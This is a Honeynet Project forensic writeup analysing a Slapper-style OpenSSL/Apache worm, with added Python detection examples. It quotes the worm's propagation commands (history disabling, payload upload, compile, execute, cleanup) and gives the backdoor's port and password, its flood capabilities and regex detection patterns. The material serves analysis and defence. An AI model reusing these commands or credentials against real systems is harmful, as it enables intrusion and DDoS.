Honeynet Project

Scan 25

Writeup by Joe Lofshult <jlofshult@cox.net>


Process

  1. Downloaded the file, .unlock, from http://honeynet.project.org/scans/scan25/.unlock.

  2. Verified that the file matched the one posted by computing the MD5 checksum of .unlock:
    $ md5sum .unlock
    a03b5be9264651ab30f2223592befb42 .unlock

  3. Determined that .unlock was a gzipped file by using the file command.
    $ file .unlock
    .unlock: gzip compressed data, deflated, last modified: Fri Sep 20 05:59:04 2002, os: Unix


  4. Unzipped the file .unlock.

    First tried:
    $ gunzip -S "" .unlock

    gunzip: .unlock: cannot decompress onto itself

    Then tried:
    $ mv .unlock .unlock.gz
    $ gunzip .unlock.gz
    $ file .unlock
    .unlock: GNU tar archive


    Untarred the file .unlock:
    $ tar xvf .unlock
    .unlock.c
    .update.c


  5. Analyzed the downloaded file and the extracted source files, .unlock.c and .update.c, to answer the questions.



Questions and Answers


  1. What is the type of the .unlock file? When was it generated?

    The file is a gzipped tar archive. Based on the output of the file command (which reads the modification time stored in the gzip header) it appears the .unlock file was created on 9/20/02 at 05:59:04.
    $ file .unlock
    .unlock: gzip compressed data, deflated, last modified: Fri Sep 20 05:59:04 2002, os: Unix
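The identification in Process step 3 and the date in this answer can be reproduced without the file and tar utilities by reading the gzip header fields directly. The Python below is an added example, not part of the original writeup; instead of the real sample it builds a constructed stand-in for .unlock (two empty files named .unlock.c and .update.c, gzipped with a chosen MTIME of 2002-09-20 05:59:04 UTC, since the time zone of the real timestamp is not known) and then reads MTIME, the compression method, the OS byte and the inner tar magic from it.

```python
import gzip, io, struct, tarfile, time

GZIP_MAGIC = b"\x1f\x8b"
GZIP_OS = {0: "FAT", 3: "Unix", 7: "Macintosh", 11: "NTFS", 255: "unknown"}  # RFC 1952 subset

def gzip_header_info(data):
    """Parse the fixed 10-byte gzip header (RFC 1952): magic, method, flags, MTIME, XFL, OS.
    MTIME is what `file` prints as 'last modified'; it is simply a field the compressor wrote."""
    if len(data) < 10 or data[:2] != GZIP_MAGIC:
        raise ValueError("not a gzip stream")
    method, _flags, mtime, _xfl, os_id = struct.unpack("<BBIBB", data[2:10])
    return {
        "method": "deflate" if method == 8 else "unknown(%d)" % method,
        "mtime": mtime,
        "mtime_utc": time.strftime("%a %b %d %H:%M:%S %Y", time.gmtime(mtime)),
        "os": GZIP_OS.get(os_id, "unknown(%d)" % os_id),
    }

def identify_payload(data):
    """Decompress and report whether the inner stream is a tar archive and which members it holds.
    Tar is recognised by the 'ustar' magic at offset 257 of the first 512-byte header block."""
    inner = gzip.decompress(data)
    is_tar = len(inner) >= 512 and inner[257:262] == b"ustar"
    members = []
    if is_tar:
        with tarfile.open(fileobj=io.BytesIO(inner)) as tf:
            members = [m.name for m in tf.getmembers()]
    return {"is_tar": is_tar, "members": members}

def build_sample(mtime=1032501544):
    """Constructed stand-in for .unlock (not the real file): a tar holding two empty files
    named .unlock.c and .update.c, gzipped with MTIME = 2002-09-20 05:59:04 UTC (assumed)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for name in (".unlock.c", ".update.c"):
            info = tarfile.TarInfo(name)
            info.size = 0
            tf.addfile(info, io.BytesIO(b""))
    gz = bytearray(gzip.compress(buf.getvalue(), mtime=mtime))
    gz[9] = 3  # OS byte: Python writes 255 (unknown); the real .unlock reports 3 (Unix)
    return bytes(gz)

if __name__ == "__main__":
    sample = build_sample()
    print(gzip_header_info(sample))
    print(identify_payload(sample))
```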


  2. Based on the source code, who is the author of this worm? When was it created? Is it compatible with the date from question 1?

    Based on the source code, the author of .unlock.c is contem@efnet with "some modification done by aion (aion@ukr.net)". The latter also takes credit for the .update.c file - "code by aion (aion@ukr.net)".

    The last modification dates on the two source files are:
    .unlock.c Sep 20 08:28
    .update.c Sep 19 16:57

    The date on the .update.c file is consistent with the gzipped file, but the .unlock.c file appears to be newer than the archive. One possible explanation for this is that the source code was written on one system and then copied to another before being gzipped, and the clocks on the two systems were out of sync.


  3. Which process name is used by the worm when it is running?

    When the worm runs it disguises itself by appearing to be a web server process, httpd.
    #define PSNAME "httpd "
    ...
    strcpy(argv[0],PSNAME);

    The worm also compiles itself so that its binary file will have the name httpd, although it will be in /tmp.
    gcc -o /tmp/httpd /tmp/.unlock.c -lcrypto


  4. In which format does the worm copy itself to a newly infected machine? Which files are created in the whole process? After the worm executes itself, which files remain on the infected machine?

    The worm copies itself as a uuencoded copy of a gzipped tar file, with the name /tmp/.unlock.uu. The program then uudecodes the file, producing /tmp/.unlock. It extracts the contents of the archive to /tmp, which are .unlock.c and .update.c, and compiles them to /tmp/httpd and /tmp/update, respectively. After the worm starts a copy of itself on the target machine it attempts to remove the evidence of its existence by deleting /tmp/.unlock.uu, /tmp/.unlock.c, /tmp/.update.c, /tmp/httpd, and /tmp/update. Note that this final rm -rf does not list /tmp/.unlock, so the gzipped tar archive itself is the one file left behind in /tmp.

    writem(sockfd,"export TERM=xterm;export HOME=/tmp;export HISTFILE=/dev/null;"
                  "export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin;"
                  "exec bash -i\n");
    writem(sockfd,"rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c "
                  "       /tmp/httpd /tmp/update /tmp/.unlock; \n");
    writem(sockfd,"cat > /tmp/.unlock.uu << __eof__; \n");
    zhdr(1);
    encode(sockfd);
    zhdr(0);
    writem(sockfd,"__eof__\n");
    writem(sockfd,"uudecode -o /tmp/.unlock /tmp/.unlock.uu;   "
                  "tar xzf /tmp/.unlock -C /tmp/;              "
                  "gcc -o /tmp/httpd  /tmp/.unlock.c -lcrypto; "
                  "gcc -o /tmp/update /tmp/.update.c;\n");
    sprintf(rcv,  "/tmp/httpd %s; /tmp/update; \n",localip);
    writem(sockfd,rcv); sleep(3);
    writem(sockfd,"rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c "
                  "       /tmp/httpd /tmp/update; exit; \n");

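
A defender can turn this command sequence into a detection over captured shell input (a honeypot session log, auditd execve records, or the command stream seen on the exploited connection). The Python below is an added example, not part of the worm source or the original writeup; the session lines it scans are constructed to mirror the fragment above, and the threshold of three indicators is an assumption.

```python
import re

# One regex per step of the command sequence the worm pushes over the exploited
# connection (the .unlock.c fragment quoted above); each is matched per captured line.
INDICATORS = {
    "histfile_disabled": r"export HISTFILE=/dev/null",
    "uu_heredoc":        r"cat > /tmp/\.unlock\.uu << __eof__",
    "uudecode_archive":  r"uudecode -o /tmp/\.unlock /tmp/\.unlock\.uu",
    "extract_to_tmp":    r"tar xzf /tmp/\.unlock -C /tmp/",
    "build_httpd":       r"gcc -o /tmp/httpd\s+/tmp/\.unlock\.c -lcrypto",
    "build_update":      r"gcc -o /tmp/update /tmp/\.update\.c",
    "run_payload":       r"/tmp/httpd \S+; /tmp/update",
    "cleanup":           r"rm -rf /tmp/\.unlock\.uu /tmp/\.unlock\.c /tmp/\.update\.c",
}

def scan_session(lines, threshold=3):
    """Return (hits, infected) for a list of captured command lines.

    hits is the ordered list of distinct indicator names that fired; infected is True
    once at least `threshold` of them fire (assumed value), so a partial or slightly
    edited copy of the sequence is still flagged while a lone gcc build in /tmp is not."""
    hits = []
    for line in lines:
        for name, pattern in INDICATORS.items():
            if name not in hits and re.search(pattern, line):
                hits.append(name)
    return hits, len(hits) >= threshold

# Constructed capture of a session like the one the worm opens (not real traffic).
SAMPLE_SESSION = [
    "export TERM=xterm;export HOME=/tmp;export HISTFILE=/dev/null;exec bash -i",
    "rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c /tmp/httpd /tmp/update /tmp/.unlock;",
    "cat > /tmp/.unlock.uu << __eof__;",
    "begin 644 .unlock",
    "__eof__",
    "uudecode -o /tmp/.unlock /tmp/.unlock.uu; tar xzf /tmp/.unlock -C /tmp/; "
    "gcc -o /tmp/httpd  /tmp/.unlock.c -lcrypto; gcc -o /tmp/update /tmp/.update.c;",
    "/tmp/httpd 192.0.2.10; /tmp/update;",
    "rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c /tmp/httpd /tmp/update; exit;",
]

BENIGN_SESSION = ["cd /tmp", "gcc -o /tmp/test test.c", "ls -la"]

if __name__ == "__main__":
    print(scan_session(SAMPLE_SESSION))
    print(scan_session(BENIGN_SESSION))
```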

  5. Which port is scanned by the worm?

    The worm scans port 80 for vulnerable versions of the Apache web server on specific Linux distributions. It connects on port 80 and sends the request "GET / HTTP/1.1\r\n\r\n" which is illegal since HTTP/1.1 requires a Host header. The web server returns a 400 error and reveals information used by the worm to determine if the server is vulnerable.
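Because the probe is a malformed request, it leaves a distinctive entry in Apache's access log. The Python below is an added example, not from the original writeup; it flags 400 responses to a bare GET / HTTP/1.1 and counts them per client over a constructed combined-format log excerpt (addresses are from the documentation ranges, not real hosts).

```python
import re
from collections import Counter

# Apache combined-log line: client, ident, user, [time], "request", status, bytes, ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) (\S+)" (\d{3}) \S+')

def is_probe(line):
    """True for the worm's fingerprinting request: a bare 'GET / HTTP/1.1' that Apache
    rejected with 400 because the Host header HTTP/1.1 requires was missing."""
    m = LOG_RE.match(line)
    if not m:
        return False
    _ip, method, path, proto, status = m.groups()
    return method == "GET" and path == "/" and proto == "HTTP/1.1" and status == "400"

def probing_clients(lines):
    """Count such 400s per client IP so scanning sources stand out from normal traffic."""
    counts = Counter()
    for line in lines:
        if is_probe(line):
            counts[LOG_RE.match(line).group(1)] += 1
    return dict(counts)

# Constructed access-log excerpt, not a real capture.
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Sep/2002:06:01:12 +0000] "GET / HTTP/1.1" 400 385 "-" "-"',
    '198.51.100.5 - - [20/Sep/2002:06:01:40 +0000] "GET /index.html HTTP/1.1" 200 2326 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [20/Sep/2002:06:02:03 +0000] "GET / HTTP/1.1" 400 385 "-" "-"',
    '203.0.113.7 - - [20/Sep/2002:06:02:30 +0000] "GET / HTTP/1.0" 200 1354 "-" "Lynx/2.8"',
    '203.0.113.9 - - [20/Sep/2002:06:03:11 +0000] "GET /missing HTTP/1.1" 404 279 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    print(probing_clients(SAMPLE_LOG))  # {'192.0.2.10': 2}
```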


  6. Which vulnerability does the worm try to exploit? In which architectures?

    The worm tries to exploit an error in OpenSSL (the SSL v2 vulnerability referred to in question 9), documented in CERT Vulnerability Note VU#102795 and CERT Advisory CA-2002-23. The architectures it attempts to exploit are listed in the following table, as taken from the .unlock.c source code (the Gentoo entry has no version listed):

    Linux Distribution   Apache Version
    ------------------   ----------------------------------------------------------------
    Gentoo
    Debian               1.3.26
    Red-Hat              1.3.06, 1.3.09, 1.3.12, 1.3.19, 1.3.20, 1.3.26, 1.3.23, 1.3.22
    SuSE                 1.3.12, 1.3.17, 1.3.19, 1.3.20, 1.3.23
    Mandrake             1.3.14, 1.3.19, 1.3.20, 1.3.23
    Slackware            1.3.26

  7. What kind of information is sent by the worm by email? To which account?

    Mail is sent to the e-mail address aion@ukr.net via mailserver freemail.ukr.net. The "mail from:" address used is test@microsoft.com. The information sent is the hostid and hostname of the newly infected host, and the IP address of the system from which the worm came (the infecting system).


  8. Which port (and protocol) is used by the worm to communicate to other infected machines?

    The worm communicates with other machines infected with this worm using UDP messages on port 4156.


  9. Name 3 functionalities built into the worm to attack other networks.

    Besides the obvious ability to spread itself via the SSL v2 vulnerability, the worm also has the ability to launch attacks against other networks, either by itself or, more likely, as part of a DDoS attack. The DoS attacks built in are:
    1) UDP Flood (line 2205: case 0x29: { // Udp flood )
    2) TCP Flood (line 2246: case 0x2A: { // Tcp flood )
    3) IPv6 Flood (line 2279: case 0x2B: { // IPv6 Tcp flood )
    4) DNS Flood (line 2308: case 0x2C: { // Dns flood )


  10. What is the purpose of the .update.c program? Which port does it use?

    It creates a backdoor for remote access which listens for connections on TCP port 1052. By default the backdoor grants shell access as the user that was running the Apache web server. The password "aion1981" is required to gain shell access.


  11. Bonus question: What is the purpose of the SLEEPTIME and UPTIME values in the .update.c program?

    To make the backdoor more difficult to detect, since it only listens for connections for UPTIME seconds every SLEEPTIME seconds. Since the source sets UPTIME to 10 and SLEEPTIME to 300, the backdoor is listening for connections on port 1052 for only 10 seconds every 5 minutes.
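
The consequence for detection can be quantified: a poller (netstat, lsof, or a port scan) that runs every N seconds only sees the listener if one of its probes lands inside the 10-second window. The Python below is an added example, not from .update.c or the original writeup; it models the listen/sleep cycle with the values above (assuming whole-second timing) and computes, per cycle, the worst-case and random-phase chance of observing port 1052.

```python
from math import gcd

SLEEPTIME = 300  # seconds .update.c sleeps between listening windows
UPTIME = 10      # seconds port 1052 stays open in each cycle

def is_listening(t, phase, sleeptime=SLEEPTIME, uptime=UPTIME):
    """True if the backdoor accepts connections at second t, given the cycle's start offset."""
    return (t - phase) % sleeptime < uptime

def per_cycle_detection(interval, sleeptime=SLEEPTIME, uptime=UPTIME):
    """For a poller run every `interval` seconds, return (worst, average): the fraction of
    listening windows that receive at least one probe, minimised over every integer phase
    and averaged over all phases (i.e. a phase the defender does not know)."""
    period = sleeptime * interval // gcd(sleeptime, interval)  # lcm: pattern repeats here
    cycles = period // sleeptime
    rates = []
    for phase in range(sleeptime):
        seen = set()
        for t in range(0, period, interval):
            if is_listening(t, phase, sleeptime, uptime):
                seen.add(((t - phase) // sleeptime) % cycles)  # which cycle this probe hit
        rates.append(len(seen) / cycles)
    return min(rates), sum(rates) / len(rates)

if __name__ == "__main__":
    for interval in (300, 60, 10, 5):
        worst, avg = per_cycle_detection(interval)
        print("poll every %3ds: worst case %.0f%%, random phase %.1f%%"
              % (interval, 100 * worst, 100 * avg))
```

With any polling interval longer than UPTIME the worst case is zero, so periodic port checks cannot be relied on for this backdoor; continuous observation (packet capture for connections to port 1052, or auditing of bind/listen calls) is needed.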